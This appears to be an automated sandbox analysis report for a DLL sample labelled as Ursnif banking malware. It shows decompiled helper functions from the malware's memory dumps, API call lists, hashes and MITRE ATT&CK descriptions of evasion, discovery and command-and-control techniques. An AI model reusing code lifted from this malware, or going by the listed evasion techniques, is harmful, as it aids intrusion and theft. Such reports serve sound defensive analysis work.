Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 92a77b9723162d74b045fa57e920b2dc074cf407e0a82c0e94d003a80e56f831
Instruction ID: b1dd1c846577b2fa95a7e5ab7c0739beb9bec9e51081b3fa5388a3ddb394ba1c
Opcode Fuzzy Hash: 92a77b9723162d74b045fa57e920b2dc074cf407e0a82c0e94d003a80e56f831
Instruction Fuzzy Hash: F9F0F4B1104308BFD3205F65DCC5C2BFBDCEB46298711896EF14682511DA71AC158A71

Uniqueness

Uniqueness Score: -1.00%

Function 00BA20BE, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BA20BE() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xbad26c; // 0x30c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xbad2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xbad26c; // 0x30c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xbad238; // 0x4cb0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00ba20be
0x00ba20c5
0x00ba210f
0x00ba2111
0x00ba2111
0x00ba20c9
0x00ba20cf
0x00ba20d4
0x00ba20d8
0x00ba20de
0x00ba20e5
0x00000000
0x00000000
0x00ba20e7
0x00ba20ec
0x00000000
0x00000000
0x00000000
0x00ba20ec
0x00ba20ee
0x00ba20f6
0x00ba20f9
0x00ba20f9
0x00ba20ff
0x00ba2106
0x00ba2109
0x00ba2109
0x00000000

APIs

SetEvent.KERNEL32(0000030C,00000001,00BA91D0), ref: 00BA20C9
SleepEx.KERNEL32(00000064,00000001), ref: 00BA20D8
CloseHandle.KERNEL32(0000030C), ref: 00BA20F9
HeapDestroy.KERNEL32(04CB0000), ref: 00BA2109

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 7e270e057e542b90552bf689348869f16ead5e76c0d93daa8e3080b7bf36506b
Instruction ID: ee167c59c5167f738d9a10c3ea70badcd2479f453ea0e93cad0c825cad569996
Opcode Fuzzy Hash: 7e270e057e542b90552bf689348869f16ead5e76c0d93daa8e3080b7bf36506b
Instruction Fuzzy Hash: 8EF03931A09311DBDB30AB39EC4BB42BBE8EB07761B054250BD06E76A8CF70C840D660

Uniqueness

Uniqueness Score: -1.00%

Function 00BA972C, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00BA972C(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xbad324; // 0x50a95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xbad324; // 0x50a95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xbad030) {
					HeapFree( *0xbad238, 0, _t8);
				}
				_t14[1] = E00BA203C(_v0, _t14);
				_t11 =  *0xbad324; // 0x50a95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x00ba972c
0x00ba972c
0x00ba9735
0x00ba9745
0x00ba9745
0x00ba974a
0x00ba974f
0x00000000
0x00000000
0x00ba973f
0x00ba973f
0x00ba9751
0x00ba9755
0x00ba9767
0x00ba9767
0x00ba9777
0x00ba977a
0x00ba977f
0x00ba9783
0x00ba9789

APIs

RtlEnterCriticalSection.NTDLL(050A9570), ref: 00BA9735
Sleep.KERNEL32(0000000A,?,00BA5068), ref: 00BA973F
HeapFree.KERNEL32(00000000,00000000,?,00BA5068), ref: 00BA9767
RtlLeaveCriticalSection.NTDLL(050A9570), ref: 00BA9783

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: bcee44f3db6ca5774b2fb9bbe8bacba78f86920fadb71a54db9d25bb049fd5a0
Instruction ID: ff1712d24e904fa97553ac3cdf2fa536b47386f3277b70c1a4df3ab0b557dcc2
Opcode Fuzzy Hash: bcee44f3db6ca5774b2fb9bbe8bacba78f86920fadb71a54db9d25bb049fd5a0
Instruction Fuzzy Hash: 5CF0F875614240EBDB20DF68DD8AF167BE8AF27740B044444F506D7661CB30EC41EB29

Uniqueness

Uniqueness Score: -1.00%

Function 00BA59EE, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00BA59EE() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xbad324; // 0x50a95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xbad324; // 0x50a95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xbad324; // 0x50a95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xbae836) {
					HeapFree( *0xbad238, 0, _t10);
					_t7 =  *0xbad324; // 0x50a95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00ba59ee
0x00ba59f7
0x00ba5a07
0x00ba5a07
0x00ba5a0c
0x00ba5a11
0x00000000
0x00000000
0x00ba5a01
0x00ba5a01
0x00ba5a13
0x00ba5a18
0x00ba5a1c
0x00ba5a2f
0x00ba5a35
0x00ba5a35
0x00ba5a3e
0x00ba5a40
0x00ba5a44
0x00ba5a4a

APIs

RtlEnterCriticalSection.NTDLL(050A9570), ref: 00BA59F7
Sleep.KERNEL32(0000000A,?,00BA5068), ref: 00BA5A01
HeapFree.KERNEL32(00000000,?,?,00BA5068), ref: 00BA5A2F
RtlLeaveCriticalSection.NTDLL(050A9570), ref: 00BA5A44

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: b40a2b0dd43a959616c9fcb2f59ad7a7feb295bf92834cf00634b120a7ff4e9d
Instruction ID: 72b2a59b6bd69e2899dd0fa7437653ea686ca77f684a93311f3be7026c223e2b
Opcode Fuzzy Hash: b40a2b0dd43a959616c9fcb2f59ad7a7feb295bf92834cf00634b120a7ff4e9d
Instruction Fuzzy Hash: 90F0D478604241EFEB28CF64DD9AB267BE5EB2B315B044158E503CB660CB30ED40DE19

Uniqueness

Uniqueness Score: -1.00%

Function 00BA552D, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BA552D(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00BA8D59(_t2);
				if(_t34 != 0) {
					_t30 = E00BA8D59(_t28);
					if(_t30 == 0) {
						E00BA677C(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00BAA89A(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00BAA89A(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00ba552d
0x00ba5537
0x00ba5539
0x00ba553f
0x00ba553f
0x00ba5548
0x00ba554c
0x00ba5558
0x00ba555c
0x00ba55d0
0x00ba555e
0x00ba555e
0x00ba5562
0x00ba5567
0x00ba556c
0x00ba5586
0x00ba5575
0x00ba5575
0x00ba5579
0x00ba557c
0x00ba5581
0x00ba5581
0x00ba558b
0x00ba55b3
0x00ba55b9
0x00ba55bc
0x00ba558d
0x00ba558f
0x00ba5597
0x00ba55a2
0x00ba55a7
0x00ba55a7
0x00ba55c3
0x00ba55ca
0x00ba55cb
0x00ba55cb
0x00ba555c
0x00ba55db

APIs

lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,00BA8CFF,?,?,?,?,00000102,00BA3331,?,?,00000000), ref: 00BA5539

Part of subcall function 00BA8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00BA9099), ref: 00BA8D65

Part of subcall function 00BAA89A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00BA5567,00000000,00000001,00000001,?,?,00BA8CFF,?,?,?,?,00000102), ref: 00BAA8A8
Part of subcall function 00BAA89A: StrChrA.SHLWAPI(?,0000003F,?,?,00BA8CFF,?,?,?,?,00000102,00BA3331,?,?,00000000,00000000), ref: 00BAA8B2

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00BA8CFF,?,?,?,?,00000102,00BA3331,?), ref: 00BA5597
lstrcpy.KERNEL32(00000000,00000000), ref: 00BA55A7
lstrcpy.KERNEL32(00000000,00000000), ref: 00BA55B3

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 3de203d17f934032527704a20e3614b4c4979c7beee6ae633041683adc43528c
Instruction ID: 7775dda3ccbd09f9ac8e37864c1245fb4a842d1e0dc6f460a3428885c2f2d6c8
Opcode Fuzzy Hash: 3de203d17f934032527704a20e3614b4c4979c7beee6ae633041683adc43528c
Instruction Fuzzy Hash: 7421C072808615EFCB225FA4D884B9E7FE9DF27380B144095F9059B211DB30DA01D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1FE0, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BA1FE0(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00BA8D59(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00ba1ff5
0x00ba1ff9
0x00ba2003
0x00ba2008
0x00ba200d
0x00ba200f
0x00ba2017
0x00ba201c
0x00ba202a
0x00ba202f
0x00ba2039

APIs

lstrlenW.KERNEL32(004F0053,?,73B75520,00000008,050A936C,?,00BA5D0B,004F0053,050A936C,?,?,?,?,?,?,00BA2885), ref: 00BA1FF0
lstrlenW.KERNEL32(00BA5D0B,?,00BA5D0B,004F0053,050A936C,?,?,?,?,?,?,00BA2885), ref: 00BA1FF7

Part of subcall function 00BA8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00BA9099), ref: 00BA8D65

memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00BA5D0B,004F0053,050A936C,?,?,?,?,?,?,00BA2885), ref: 00BA2017
memcpy.NTDLL(73B769A0,00BA5D0B,00000002,00000000,004F0053,73B769A0,?,?,00BA5D0B,004F0053,050A936C), ref: 00BA202A

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 7dd39409d96bb7f0af843a808ce7f809b8f5e0e482e7d42d71941c2a7fc2c00f
Instruction ID: 381f8c6ccce92d9456abd94b348f2ed852ffc57be28104cfcfb59cf74fa90a96
Opcode Fuzzy Hash: 7dd39409d96bb7f0af843a808ce7f809b8f5e0e482e7d42d71941c2a7fc2c00f
Instruction Fuzzy Hash: 1DF0EC76900119BB8B119BA9DC45C9E7BACEF092947154466BA0497111EA31EA149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2773, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,00BA1F32,616D692F,00000000), ref: 00BA277F
lstrlen.KERNEL32(?), ref: 00BA2787

Part of subcall function 00BA8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00BA9099), ref: 00BA8D65

lstrcpy.KERNEL32(00000000,?), ref: 00BA279E
lstrcat.KERNEL32(00000000,?), ref: 00BA27A9

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: c4cc7f64e2396230bf5dde898e44d75bec294460492f250a261570ee38e9ee65
Instruction ID: e6613507126e8aa8afc72f4a800b5e8acbe3d6c51dcee2ca15646bb4f7f1626d
Opcode Fuzzy Hash: c4cc7f64e2396230bf5dde898e44d75bec294460492f250a261570ee38e9ee65
Instruction Fuzzy Hash: 79E01237409621EB87226BA4AC08C8FBFE9FF8A3607054956F55493124CF31C9158B91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report f0t0s.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Function 00BA523C, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Function 00381266, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 00BA5DC6, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Function 00BA9932, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 00381DD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 00381812, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 00BA12C4, Relevance: 33.2, APIs: 22, Instructions: 248
memorystringCOMMON

Function 003819C7, Relevance: 24.1, APIs: 16, Instructions: 120
threadsleepsynchronizationCOMMON

Function 00BA27F7, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Function 00BA65B1, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 00BA1000, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
sleepmemorytimeCOMMON

Function 00BA6B7B, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 00381CF0, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Function 003818E1, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 00BA4EE5, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Function 0038167E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 00BA3231, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Function 00BA5C8C, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Function 00BA9425, Relevance: 4.6, APIs: 3, Instructions: 77
memoryCOMMON

Function 003815BC, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 0038133E, Relevance: 4.6, APIs: 3, Instructions: 62
stringthreadCOMMON

Function 00BA8F16, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 00BA6111, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Function 00BA918C, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 00BA5974, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 00381B3D, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 00BA8D59, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 00381E8D, Relevance: 1.3, APIs: 1, Instructions: 66
COMMON

Function 00BA3402, Relevance: 1.3, APIs: 1, Instructions: 57
memoryCOMMON

Function 00BA2AFE, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Function 00BA3651, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Function 00BA315A, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON